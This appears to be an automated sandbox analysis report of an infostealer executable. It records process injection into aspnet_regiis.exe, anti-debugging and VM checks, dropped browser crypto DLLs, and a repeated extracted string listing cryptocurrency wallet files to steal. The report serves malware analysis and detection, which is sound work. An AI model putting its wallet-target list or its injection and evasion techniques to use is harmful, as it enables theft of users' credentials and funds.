                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Thread delayed: delay time: 922337203685477 (this value is Int64.MaxValue / 10000, i.e. .NET TimeSpan.MaxValue expressed in milliseconds: an indefinite wait rather than a timed sleep)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | API coverage: 6.4 %
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe TID: 7572Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02761B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02762570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0275D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_027515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02761650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,PR_IsNetAddrType,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_0275D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027621F0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027647B0 GetSystemInfo,wsprintfA,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW/
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API call chain: ExitProcess graph end node
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC2A87A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC521B0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02765DB0 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC305EB GetProcessHeap,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC2E817 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC2A3A1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02767B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027673CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02769DB7 SetUnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C2DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C2DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_6C48AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000 protect: page execute and read and write
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC22FB0 HonorInc,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,GetThreadContext,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000 value starts with: 4D5A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_02765CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2750000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2751000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 276B000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2773000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2986000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 25AB008
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC2AA38 cpuid
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Queries volume information: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe Code function: 0_2_6CC2A4C3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027643B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 2_2_027644A0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

                        Stealing of Sensitive Information

                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                        Source: Yara match File source: dump.pcap, type: PCAP
                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
